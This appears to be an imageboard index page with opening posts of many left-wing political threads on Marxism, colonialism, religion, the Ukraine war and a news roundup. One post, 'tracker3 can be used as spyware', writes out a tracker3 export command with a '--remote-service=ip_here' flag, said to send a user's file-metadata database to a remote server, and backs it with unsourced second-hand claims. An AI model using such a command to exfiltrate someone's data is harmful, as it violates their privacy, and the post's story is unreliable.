How is the global socialist movement going to maintain communication without the global internet? The bourgeoisie is ready to clamp down on it and are preparing for a potential decoupling. What the fuck is the worthless online left doing to prepare? We needed a bunkerchan to survive the fall of 8chan. What do we have when tech conglomerates and the NSA conspire against all alternative media websites in the future? Is the online left saying or doing anything about it at all? Or are they just wasting their time reading twitter as usual?
R: 45 / I: 6
What proves the Marxist assumption of there being a linear stages of development besides just projecting Western development onto everyone else?

Alternatively, development could be rather idiosyncratic whereby differnt potential paths exist that lead to different societal arrangements. Not due to idealism but differing material circumstances and dialectical developments that unfolded unlike in the West due to differing aspects. The Western world acquired a way of being and then imposed itself onto everyone else. The egocentric assumption to take the West as the absolute standard to measure things against is common in Western thought and Marx as a European simply reflected the same fallacious presumption. The success of this imposition is then later on erronously taken as evidence of a linear development that must proceed like in the West.

We can't know if there couldn't have been other developmental pathways because Europeans colonized the world and forced their system upon everyone else. During colonialism the colonized population was essentially reduced to slavedom and after colonialism many formerly colonized societys were willing to transition to socialism Clandestine Western operations or open military interventions subverted these third world countries who attempted socialism and forced them to adopt capitalism as well.

I just don't see what feudalism must and can only proceed with the private ownership of the means of production whereby people sell their labor for commodity production.
R: 128 / I: 40

muh CIA

I'm sorry but how is saying "an intelligence agency is responsible for it" to any world event not merely great man theory by another name. That for example any problems run into by the USSR or China were cuz muh CIA. IF great man theory is wrong, why does it suddenly become right if that "great" man is an intelligence agent?

Isn't this unmarxist? Obsession with intrigues can only lead down a path from the lofty heights of institutional and historical analysis to conspiracism, paranoia, and ultimately right wing schizo-ism and antisemitism.
R: 17 / I: 5

Hatred of the lumpenproletariat

This is from Engels' 'Prefatory Note to The Peasant War in Germany':
>"The lumpenproletariat, this scum of the depraved elements of all classes, which established headquarters in the big cities, is the worst of all possible allies. This rabble is absolutely venal and absolutely brazen. If the French workers, in every revolution, inscribed on the houses: Mort aux voleurs! Death to thieves! and even shot some, they did it, not out of enthusiasm for property, but because they rightly considered it necessary above all to keep that gang at a distance,, Every leader of the workers who uses these scoundrels as guards or relies on them for support proves himself by this action alone a traitor to the movement"
What is the justification behind such a damning condemnation of the lumpeproletariat by Engels here? And why does it seem this interpretation has fallen out of favor in the communist left? When did this shift occur? Are lumpens really that problematic from a Marxist perspective? It would seem to me, that rather than an active obstacle to communist goals, as some Marxists seem to put it, the lumpenproletariat seems to be a rather passive force that has little to no impact on politics; unless they are used by organized groups I suppose? Is that the Marxist criticism, that they are instrumentalized by the ruling class against the proletariat? https://www.marxists.org/history/erol/periodicals/red-papers/red-papers-2/franklin.htm
R: 143 / I: 27

The Limitations of Anti-Religious Criticism

The fundamental leftist critique of religion is that religion lulls the masses into complacency with promises of a better life in Heaven and an assurance that the Earthly order is ordained by Providence and, on the flip side, recognition of the falsehood of religious belief will cause the masses to undergo a radical re-evaluation of the world, the way it is organized, and their relationship with their fellow man. But here in 2024, and in the Western world, is this still relevant?

Let's look at the first claim. Is the largest or even significant ideology keeping the masses in line the promise of a better life in Heaven? Do the actively religious actually believe that the world order as it is established now is the product of divine providence? I would say that obviously this is not the case and hasn't been for a while. What subdues the masses can vary from country to country, but at least in America (and increasingly around the world) it is not the promise of Heaven that motivates the masses to stay in line, but the promise of earthly reward. The "temporarily embarrassed millionaires" attitude has long been an aspect of the American ideology, but I would argue that it has moreso and moreso taken on the religious aspect of maintaining social compliance. First you had Horatio Alger stories which generally portrayed a "rags-to-riches" narrative based on young men engaged in some kind form of good works to rise above the poverty while benefiting their community, which then turned to Ayn Rand's stories which rejected outright any greater social responsibility of the industrialist tycoon, instead portraying them as pseudo-divine "Great Man" figures for which all the industry and wealth of the world was merely an extension of their great personalities and any attempt to direct or interrupt their great works was to invite disaster upon the world, for the world needs the entrepreneur, the entrepreneur does not need the world. This is further developed by the "self-help" movement that began to take off in the 70s, where often men of wealth would give advice on how to get rich to the masses, but this "advice" was almost never about making shrewd business decisions or actual ways of acquiring capital and business deals, but a litany of all the supposed morals and examples of virtuous living the wealthy supposedly possessed. And then, finally, to top it off we have "The Secret," a bestselling novel which posited that it is not simply being a great personality and having great virtue that makes one rich, but also one's mentality. To get rich, you must quite literally have faith and piety in Capital and all problems can be solved essentially with a secular version of prayer. And flagrant nonsense though it may be, it has nonetheless integrated itself into into the greater Cult of the Entrepreneur. There's now tons of media of wealthy people spouting this exact ideology, giving examples of how they live their lives in virtue and always remember to say their prayers to capital. And, in spite of the complaints of the "retvrn to tradition" people, the otherworldly look of the abstract and minimalist designs of most modern homes and luxuries of rich people really adds to this effect. Unlike old manorial style homes, these new properties give the impression that the wealthy have not simply gotten rich, but are no longer of this world and have ascended to Elysium. And it's this ideology that appears to have captured the imaginations of most of the proletariat who refuse improvements in their own real lives in the modern day. They're not coaxed with promises of an honored place in the afterlife, but with the promise of an ascension into an earthly paradise. The "I don't take too much stock in this world because my treasure is in Heaven" types are an absolute dying breed, even among the religious and this has taken its place (even in religious communities in the form of the "Prosperity Gospel"!)

There's also the question of if people will have any kind of radical re-evaluation of the world once they lose their religious views, and I would once again say that this has been fairly debunked even as recently as the last decade after the NuAtheists all became a big gaggle of reactionaries. As it turns out, "Nature" can be a perfectly adequate replacement for God in the reactionary worldview. The world and everyone's place in it can very easily be trumped up to supposedly self-evident natural laws rather than divine providence, and in some ways I would argue that this is even more oppressive than the divine order. The order of the world being mandated by Heaven still leaves some wiggle room. After all, Heaven has enemies and who's to say that our earthly powers aren't actually in league with Hell? Nature, on the other hand, is immutable. To claim that the order of the world is natural is to claim that it is as set in stone as the law of gravity, of the wind and the tides, of the setting of the sun in the west. And what's more, not only have the NuAtheists of the Aughts become reactionaries, guys like Richard Dawkins and Bill Maher are even massive Zionists. I guess the fact that God doesn't exist doesn't mean He didn't give the land of Israel to the Jews! So what was the the refutation of religion even supposed to change in these people if it doesn't even inoculate them against Zionism?

The problem with engaging in all of this is that we are simply acting as toadies for secular liberalism. Among many secular liberals, religion is used as the sin eater for liberalism's failures. Religion is portrayed as the evil seed from which all reactionary thought grows and is the perennial reason why liberalism continues to fail to live up to its promises, continues to push for ever crueler policies both at home and abroad and why its in a slow collapse. A certain brand of secular liberal points at religion when they don't want to acknowledge that the calls are coming from inside the house. And we don't need to cape for the liberals and uphold their delusions.

Religion is in many ways a vestigial and dying institution, at least in the West. I cannot remember a time like now when even the supposedly religious have just thrown aside any pretense that they were ever motivated at all by their supposed religion, where reactionaries pushing religiosity have just openly said that they're doing it cynically because they think that it will somehow uphold the social order they want. They almost never even have a reason why they think pushing their particular religion will uphold any particular social order beyond "the past was more religious than now." I think critiquing them on religious grounds is giving them credit they don't deserve. Its to imply that this is all about some transcendent and spiritual worldview when its clearly not. To be blunt, ever since Trump rose up as a political force, I haven't been able to take the religious right seriously as a religious movement and I don't know why other people humor them.

It's giving the liberals support we shouldn't be giving them and showing the right a form of respect they don't deserve.
R: 2 / I: 0 (sage)

Is propping up the failed state of Israel worth the effort?

A nation that cannot function without foreign patronage is a failed state. What would happen if the United States stopped paying for 20% of Israel's military budget, stopped bribing Egypt and Jordon to tolerate Israel, stopped vetoing UN resolutions and stopped blocking ICC war crimes investigations?
R: 500 / I: 97  

/ukr/ - Russia-Ukraine war general #179: Comfy Happening In Ukraine Edition

Remember!!: Stay comfy, my ziggas!

Previous thread: >>>/leftypol/1881776


Evidence of the influence and origin of neo-Nazi groups in Ukraine



Live maps and updates
DeepStateMap: https://deepstatemap.live
Events in Ukraine: https://eventsinukraine.substack.com/
SouthFront: https://southfront.org/category/all-articles/world/europe/ukraine/

Watch Together
📺 News/events: https://tv.leftypol.org/r/HappeningsviaKlash
📺 Hangout/chill: https://tv.leftypol.org/r/bloodcast

Watch By Yourself
>Video Essays / Historical Background
📺 Ukraine: The Avoidable War - Boy Boy

📺 America, Russia, and Ukraine's Far Right - Gravel Institute
~~https://www.youtube.com/watch?v=t0pyVJG7_6Q~~ (Link TBA)

📺 Crimea vs Taiwan: Who Gets Self-Determination? - BadEmpanada

📺 The Nature of Putin's Russia and Its Causes (3-Part Series) - 1Dime

<Current Happenings
📺 The Grayzone: https://www.youtube.com/@thegrayzone7996
📺 DDGeopolitics: https://www.youtube.com/@DDGeopolitics
📺 Defense Politics Asia: https://www.youtube.com/@DefensePoliticsAsia
📺 The Duran: https://www.youtube.com/channel/UCdeMVChrumySxV9N1w0Au-w
📺 The News Atlas: https://www.youtube.com/c/thenewatlas
📺 Military Summary: https://www.youtube.com/@militarysummary


Social media


Thread guidelines:
• Please remember to add a spoiler to NSFW and extreme content such as graphic violence and gore.
• Try your best to not derail discussion too much from the main events and relevant places where the war is taken place, as well as other happenings, groups and public figures related to it.
• Meta discussion of the historical, philosophical and ideological background of the war is fine as long as its done in good faith and comradely.
• In the event the meta discussion overstays its welcome, participating users will be referred to take the conversation to the MULTIPOLARISM general thread: >>>/leftypol/1590991
• Quality shitposting and original content is encouraged! Spamming glowie memes is low effort.
• Remember to take your meds! It helps mediate schizoposting and foot fetishism
• this is /isg/ for people who treat geopolitics like shitty map games
R: 180 / I: 47
What’s your opinion on Joseph Stalin what do you think he was a bad guy or not?
R: 4 / I: 0  

tracker3 can be used as spyware

Hello, consider me a guy who happens to know top secret leakers because I've been interacting with amateur researchers that recovered a computer the US Government hacked. And apparently they declassified federal (glowie) tricks

Here are packages the glowies download on the recovered computer


Here is what the researchers observed and then told me

1.Glowies use tracker-extact-3 to grab meta data from the users files as they update in real time. Tracker Extract does this natively and that is the main thing it is intended to do.

2.Then the glowies run the command (this is the malicious act)

tracker3 export –database=/home/user/.cache/tracker3/files/ –output=json-ld

with an additional `–remote-service=ip_here` so they can send the tracker3 database back to their feddie databases. The json-ld file is read using json reading software to display text and rendered pdf, video and image thumbnails and audio cover art. This gives them real time monitoring of an OS because they are getting recent file meta data.

Glowies also look in plocate databases as well. This is all 100% real. So try to be accurate as possible and not spread misinformation when you finally get to covering it. Tracker3 is not a virus and is inherently NOT harmful software. It does very useful things such as find pdfs and images via GNOME's photo and pdf reader. It is just that it happens to have the potential to be malicious. Said researchers stated that the goal for the community to patch this insecurity by warning if tracker is trying to export meta data base to a foreign server. Meaning the end user should be alerted via the GUI if tracker is doing this.
R: 20 / I: 1

DPRK truth

Why is the DPRK the only country westerners will believe literally anything about?

If the NY Times reported Kim Jong-Un was a shape-shifting alien people would believe it. Why?

Also, can we get a thread on the most outrageous things said about this defiant nation?
R: 5 / I: 1

trots in control

Victory for the CIA in France it seems bros

>UK & France Trots still filled with spooks

>Macron fulfilling neo-con prophecy by putting Trots in charge
>LmaoPen seething
>CIA winning
R: 47 / I: 4
Is there a left, anyhow, in europe?
I feel like all the "left" parties are just neoliberals that hand out gibs and celebrate transhumanism but none of them has any real anti-imperialist or anti-american policy
R: 220 / I: 28

Georgia and its consiquences

I know i know irrelevant shithole in the middle east and whatever but on the other hand
This article lays things out very nicely
R: 260 / I: 26  

human supremacy?

We all know that racist against other humans is bad. But what about the vegan argument that humans are being supremacist to animals are we are no morally better than them? If non human intelligent life exists should humanity treat them as equals or go full WH40k?
R: 39 / I: 13

What is the real "political compass"?

So in Marxist dialectic things are only viewed through the lens of class rendering any political compass useless, right? How does that explain the disagreements between fascists and capitalists, or anarchists and Marxists? Is it basically pro-proletariat, or pro-bourgeosie but with different ideas about how things should be ran? Why do fascists claim to be anti-capitalist, or anarchists accuse Marxists of being fascists? If capitalism is pro-fascism at the end of the day why is the West seemingly so socially liberal? Do capitalists essentially just view fascists as attack dogs that they have to keep leashed? If both anarchists and Marxists want a classless society at the end of the day aren't they more similar than different?
R: 39 / I: 0
Irrespective of how subjectively morally appealing it may seem, every step in the direction of stricter state surveillance and censorship by definition means the forging of an apparatus that will be utilized ruthlessly against a potential proletarian movement in the future. This applies to every single scenario where dimwitted losers cry out for more state intervention to censor anything from casteism to anti-Muslim rhetoric.
R: 34 / I: 2


Have YOU done your self-criticism today? Have you done a REAL proper self-critique? Prove you're a real Marxist and do self-criticism TODAY.

The slogan of self-criticism must not be regarded as something temporary and transient. Self-criticism is a specific method, a Bolshevik method, of training the forces of the Party and of the working class generally in the spirit of revolutionary development. Marx himself spoke of self-criticism as a method of strengthening the proletarian revolution.
The purpose of self-criticism being to disclose and eliminate our errors and weaknesses.

The attitude of a political party towards its own mistakes is one of the most important and surest ways of judging how serious the party is and how it in practice fulfils its obligations towards its class and the toiling masses. Frankly admitting a mistake,* ascertaining the reasons for it, analysing the circumstances which gave rise to it, and thoroughly discussing the means of correcting it—that is the earmark of a serious party; that is the way it should perform its duties, that is the way it should educate and train the class, and then the masses.

The proletariat is not afraid to admit that this or that thing has succeeded splendidly in its revolution, and this or that has not succeeded. All revolutionary parties which have hitherto perished, did so because they grew conceited, failed to see where their strength lay, and feared to speak of their weaknesses. But we shall not perish, for we do not fear to speak of our weaknesses and shall learn to overcome them.

Criticise the shortcomings of our constructive work, but do not vulgarise the slogan of self-criticism and do not turn it into a medium for ostentatious exercises on such themes as "Double-Bed Bandits," "A Shot That Misfired," and so on.

Criticise the shortcomings in our constructive work, but do not discredit the slogan of self-criticism and do not turn it into a means of cooking up cheap sensations.

Criticise the shortcomings in our constructive work, but do not pervert the slogan of self-criticism and do not turn it into a weapon for witch-hunts.
R: 204 / I: 22

Colonialism = Progress?

Because of this thread >>1905865 I felt like making this one just to get an array of opinions in and work this out. The central question of this thread is:

Was European colonialism a progressive force in the world?

As with all things, context matters and nuances exist, so feel free to mention and bring them in by your own accord. We could then proceed by talking about what precisely makes colonialism a progressive force and when it is not a progressive force. Additionally, what can we admit did Marx and Engels get wrong about their beliefs on European colonialism without condemning them in a moralizing manner.
R: 292 / I: 35 (sage)
>omg Engels was le racist by calling Mexicans lazy
Nobody saying this has been able to prove, even once, that Engels explains the ability of the Yankees to make use of California by reference to innate racial characteristics. Their whole argument is that he describes the Mexicans as lazy - lazy because they couldn’t make use of the land! Engels even explicitly explains his reasoning (see pic).
R: 3 / I: 0
Who is your favourite Capital reader?

It's hard to pick, but for me, George Blake was a good one.
Hard mode: don't pick another famous author like john lennon
R: 6 / I: 2
are imperialism and colonialism just subsets of categories or are they their own distinct categories with some overlap? if the latter is the case, then what do we call the various intersections of imperialism, colonialism, and capitalism? What are the numbered categories of pic related called? Are there distinct names for these? What are their qualities? Is this the wrong way to think about capitalism?
R: 762 / I: 134 (full)  

/leftybritpol/ - Bored of the Election Edition

A thread for Brits to discuss green energy, the psychology of homosexuality, JK Rowling, and prisoners having sex with wardens

Also there's an election going on but everyone got bored of it a week ago because they go on for too long, maybe someone will do a cytube for it if anyone even remembers it's happening
R: 51 / I: 12

Sino-Russian border disputes

I have feelings that border disputes would break the minds of Anti-Imperialist autists between Russia and China, since they’re both based anti-imperialist squads
R: 45 / I: 4

Why is this gender polarization happening? And what should we do about it?

A new poll in Spain shows declining acceptance for LGBTQ+ people among Gen Z with the change being entirely driven by young men.

Yellow = Men Purple = Women
* Should there be a straight pride day?
* I feel uncomfortable when I see a gay couple
* Sexual diversity is going to end our traditions and values that have always been

I had heard of this kind of polarization happening in South Korea years ago but it seems to be spreading elsewhere now, specially in continental Europe. Anglo countries and Latin America are yet to be hit, I think.
R: 19 / I: 1

How living in the end of the world feels like: Modern Man

In our current globally liberal landscape that promises little to no meaningfull political or social change, what is the usual spirit of the average Joe of the developed or in world power countries? (America/China/Japan/Europe/Canada,Europe/etc.)
This thread is for answers related: Like mental health characteristics, declining fertility rates, contemporary health related issues, contemporary motivations, anxieties and hopes,the homogenization of culture, rising forms of escapism, and etc that affects or why is modern behaviour, you get the idea.
R: 15 / I: 2
Isn’t that just singlehood? what characteristic of this basic lifestyle many have adopted throughout the Holocene makes it a political movement? Is political progress in SK just that slow?
R: 29 / I: 3

Will the effects of the current war in Ukraine force armies to favour numbers again?

If the current mass losses in specially trained soldiers in Russia’s and Ukraine’s army has taught any army general anything, it’s that spending so much money on individual infantrymen is pointless if those people are just going to be the first to die in conflicts scaled against them. This knowledge could encourage militaries of the future to spend less on army divisions, and to focus more on trying to make each soldier available to them as cheap and versatile as possible. However, it’s unlikely that this change will cause specialization in army divisions to completely disappear, just that specialization will become less sought after.
What do you think?
R: 11 / I: 1

News 7/1/24

Iran's Oil and Gas Workers' Strike Grows: 20,000 Workers, 110 Companies
Launched by the unofficial Council for Organizing Oil Contract-Workers' Protests, the strike began on June 19. The workers are demanding the removal of intermediary contractors, wage increases, a 14-days-on, 14-days-off work schedule, improved dormitory conditions, and enhanced safety measures. The Council has warned that the strikes will intensify if these demands are not met.

Israel frees hospital chief with prisons ‘full’ of Gaza captives
Israel released 55 prisoners on Monday to free up space in its jails, unconfirmed reports claimed. Speaking shortly after his return to Gaza, al-Shifa Hospital Director Muhammad Abu Salmiya asserted that Palestinian prisoners in Israel’s prisons were facing daily abuse.

Turkish airstrike starts a fire on Mount Metina in South Kurdistan
While the occupying Turkish state has increased its attacks on Mount Metîna in recent days, it deployed a large number of troops, heavy weapons and armoured vehicles to the villages in the region. Many villages were evacuated due to the attacks. Baghdad and Hewlêr (Erbil) remain silent in the face of Turkish occupation.

Rift between Bolivia's left widens as Morales joins accusation that Arce faked last week's coup attempt
Mr Arce retorted that his former boss should not “make another mistake. “Clearly what happened was a failed military coup. Do not side with fascism and those who deny what happened. Those responsible … will be prosecuted, as was the case with the conspirators of the 2019 coup.” Minister for the Presidency Maria Nela Prada added that Mr Morales should not become a “puppet of imperialism, that intends to plunder our country.”

Peru's ex-presidential candidate Keiko Fujimori begins trial for money laundering
According to prosecutors, Popular Force was used to irregularly receive some $17 million from various contributors, such as Brazilian construction conglomerate Odebrecht (renamed Novonor in 2020) and Peruvian financial holding company Credicorp (BAP.LM).

Police use digger to remove Palestine Action activist from weapons company building
POLICE used a JCB digger to remove a Palestine activist from a building when a company supplying an Israeli-owned British arms manufacturer with equipment was occupied and blockaded today.

The reality of living in Ibiza: Workers sleeping in vans due to high cost of rent
On this popular Spanish Mediterranean island, growing numbers of wealthy tourists in combination with real estate speculation (which corrodes everything from luxury developments to the dingiest rental rooms) have made the price of housing soar, making it unaffordable for a good portion of the army of workers who make sure that the machinery that sustains this summer paradise remains well oiled.

France's far-right makes gains in southeast, fails to make a breakthrough in Paris
The party of Marine Le Pen and Jordan Bardella topped the poll with 33.15 percent of the votes cast for members of the National Assembly, according to preliminary results published by the interior ministry. The leftwing New Popular Front alliance was in second place with 28.14 percent, ahead of President Emmanuel Macron's centrists on 20.76 percent.

SADTU objects to Gwarube heading Ministry of Basic Education
“They’ve always made statements that SADTU- for all the problems that are there in the education sector, they always put them on SADTU’s doorstep. They always accuse us of opposing the education in this country, of being in charge of education, and of controlling the department of education and the ministers and all,” added Cembi.

Looting and fighting reported in a central Sudan city as paramilitary group attacks military troops
The paramilitary Rapid Support Forces began its offensive against Sudan’s military in Sennar province earlier this week, attacking the village of Jebal Moya before moving to the provincial capital of Singa, where fresh battles have erupted. The fighting forced about 57,000 people to flee their homes, according to the United Nations.
R: 20 / I: 5

nikolai bukharin

is there anything of note this guy did? i know he was leader of the right opposition in the USSR but like i have never seen a single important contribution to marxist theory this guy made, at least with stalin vs trotsky debate both have some notable theory (stalin based cry about it trotskkkyites and leftkkkoms) but never heard of anything bukharin wrote
R: 15 / I: 4
The main problem with third worldism is visible from the get-go: no matter if you propose a confederation of independent third world nations or a single state that encompasses, say, all of the Arab states, you are still speaking in terms of nation, and you are still speaking in terms of competition between states, of "national liberation", a movement that had been justified by the Comintern as a transitory task when the working masses of Europe and North America had lost the train of revolution. The problem with this is that it ignores that the argument of communists back then hinged on a theory of semi-feudalism and a numerically insufficient proletariat. What befalls communists today, however, is to understand that revolution cannot fell capitalism without an international organization for it.

In most cases where two currents clash, third worldists fail to hide their disdain for the working class in "first world countries" and hold by the mistaken belief that "third world" workers are more revolutionary by default, which is a prediction that does not stand up to scrutiny. In their invectives against invisible "white chauvinists", they fail to see that, in trying to "enrich" internationalism, they merely impoverish it by adding the moralistic pessimism of online college student types on top.

Many of them, in trying to find a coherent actor in "third worldism", hinge their cause to a multitude of figures - the UN, the 1970's Weathermen (whose activity actually fatally weakened the class struggle), student activists, and "popular movements" that often conveniently go unnamed. What whoozes past their heads is the fact that these are all pale substitutes for the revolutionary, a-national, trans-lingual communist party, the only organ capable of giving revolutionary direction to the proletarian fight.
R: 16 / I: 8

governance of china

>By revolutionary phrase-making we mean the repetition of revolutionary slogans irrespective of objective circumstances at a given turn invents, in the given state of affairs obtaining at the time. The slogans are superb, alluring, intoxicating, but there are no grounds for them; such is the nature of the revolutionary phrase… The Communist who has failed to prove his ability to bring together and guide the work of specialists in a spirit of modesty, going to the heart of the matter and studying it in detail, is a potential menace. We have many such Communists among us, and I would gladly swap dozens of them for one conscientious qualified bourgeois specialist…

this was from a speech held at some party school thing. is xi jinping holding the line or is he swaying to the right? (see the last part of the quote above).
please don't move this to /prc/. they're just going to uncritially glaze the chairman.
R: 16 / I: 4
What is your opinion on Mao Zedong Great Leap Forward did you think it was good or bad
R: 18 / I: 0

Schools should be designed to prevent forced relocation

Schools shouldn’t be divided into preschools, elementary schools, and high schools. Schools should all be k-12+, and if possible incorporate some kind of post secondary courses too. Having schools divided and spread out only harms students, because it forces the children to constantly break the relationships they’ve formed when they’ll have to move to a new environment to learn. No one deserves to be forcefully relocated away from their community and friends at such a young age for such a petty reason. All that would do is lead to the formation of a socially atomized adult population.